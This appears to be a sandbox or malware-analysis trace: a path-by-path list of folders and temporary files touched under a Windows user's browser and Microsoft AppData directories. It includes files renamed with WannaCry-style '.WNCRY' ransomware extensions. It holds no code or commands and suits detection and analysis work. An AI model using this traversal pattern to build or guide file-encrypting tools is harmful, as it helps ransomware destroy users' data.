C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded
C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\~SDD3AA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache
C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\~SDD3EA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache
C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\~SDD41A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data
C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data\~SDD459.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload
C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\~SDD489.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel
C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\~SDD4C8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints
C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints\~SDD4F8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials
C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\~SDD4F9.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata
C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata\~SDD4FA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl
C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\~SDD4FB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved
C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\~SDD4FC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing
C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\~SDD50D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips
C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\~SDD50E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache
C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\~SDD54D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant
C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\~SDD55E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\~SDD57E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\~SDD59F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter
C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\~SDD5BF.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64
C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\~SDD5EF.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\UrlParamClassifications
C:\Users\user\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\~SDD61F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm
C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\~SDD65E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData
C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\~SDD69E.tmp
C:\Users\user\AppData\Local\History\*
C:\Users\user\AppData\Local\Microsoft\*
C:\Users\user\AppData\Local\Microsoft
C:\Users\user\AppData\Local\Microsoft\~SDD6DD.tmp
C:\Users\user\AppData\Local\Microsoft\Credentials\*
C:\Users\user\AppData\Local\Microsoft\Credentials
C:\Users\user\AppData\Local\Microsoft\Credentials\~SDD70D.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\*
C:\Users\user\AppData\Local\Microsoft\Device Metadata
C:\Users\user\AppData\Local\Microsoft\Device Metadata\~SDD73D.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\*
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\~SDD77C.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads\*
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads\~SDD78D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\*
C:\Users\user\AppData\Local\Microsoft\Edge
C:\Users\user\AppData\Local\Microsoft\Edge\~SDD7AD.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\~SDD7CD.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\~SDD7EE.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\~SDD81E.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\~SDD87C.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\~SDD8BC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\~SDD90B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\~SDD979.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\~SDD9D8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081\~SDDA27.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\~SDDA67.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\~SDDAA6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\~SDDAA7.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\~SDDAC7.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\~SDDAD8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\~SDDAE9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\~SDDAF9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\~SDDB1A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\~SDDB2A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\~SDDB2B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\~SDDB3C.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDDB8B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\~SDDBDA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\~SDDC29.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\~SDDC49.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\~SDDC5A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\~SDDC9A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\~SDDCD9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\~SDDCF9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications\~SDDD39.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\~SDDD59.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\~SDDDB8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\~SDDE07.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\~SDDE56.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\~SDDE76.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\~SDDEA6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\~SDDEE6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\~SDDF35.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\~SDDF84.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\~SDDFD3.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\~SDE022.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\~SDE081.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\~SDE0A1.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\~SDE0E1.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\~SDE101.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\~SDE150.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications\~SDE1CE.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\~SDE21D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\~SDE24D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\~SDE26D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FontLookupTableCache\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FontLookupTableCache
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FontLookupTableCache\~SDE2BC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PepperFlash\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PepperFlash
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PepperFlash\~SDE2FC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\~SDE36A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\~SDE39A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\~SDE3DA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\~SDE3EA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\~SDE40B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\~SDE42B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\~SDE46A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\~SDE4AA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\*
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\~SDE4DA.tmp
C:\Users\user\AppData\Local\Microsoft\Event Viewer\*
C:\Users\user\AppData\Local\Microsoft\Event Viewer
C:\Users\user\AppData\Local\Microsoft\Event Viewer\~SDE529.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\*
C:\Users\user\AppData\Local\Microsoft\Feeds
C:\Users\user\AppData\Local\Microsoft\Feeds\~SDE578.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~\*
C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~
C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~\~SDE5D7.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\*
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\~SDE626.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\*
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\~SDE646.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\*
C:\Users\user\AppData\Local\Microsoft\Feeds Cache
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\~SDE6B4.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\BD5QM5PR\*
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\BD5QM5PR
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\BD5QM5PR\~SDE6F4.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\S0OSSLWD\*
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\S0OSSLWD
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\S0OSSLWD\~SDE733.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\SQ4TDUZM\*
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\SQ4TDUZM
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\SQ4TDUZM\~SDE773.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\ZLFI91IZ\*
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\ZLFI91IZ
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\ZLFI91IZ\~SDE7A3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\~SDE7D3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\~SDE822.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\~SDE871.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\3HLJ65W4\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\3HLJ65W4
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\3HLJ65W4\~SDE8B0.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\D3CVYKUR\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\D3CVYKUR
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\D3CVYKUR\~SDE8D1.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DGF898HW\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DGF898HW
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DGF898HW\~SDE8F1.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DRJ7CCJA\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DRJ7CCJA
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DRJ7CCJA\~SDE8F2.tmp
